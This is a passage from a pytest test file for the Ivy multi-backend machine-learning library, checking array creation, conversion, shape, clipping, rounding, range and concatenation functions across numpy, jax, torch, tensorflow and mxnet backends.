"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
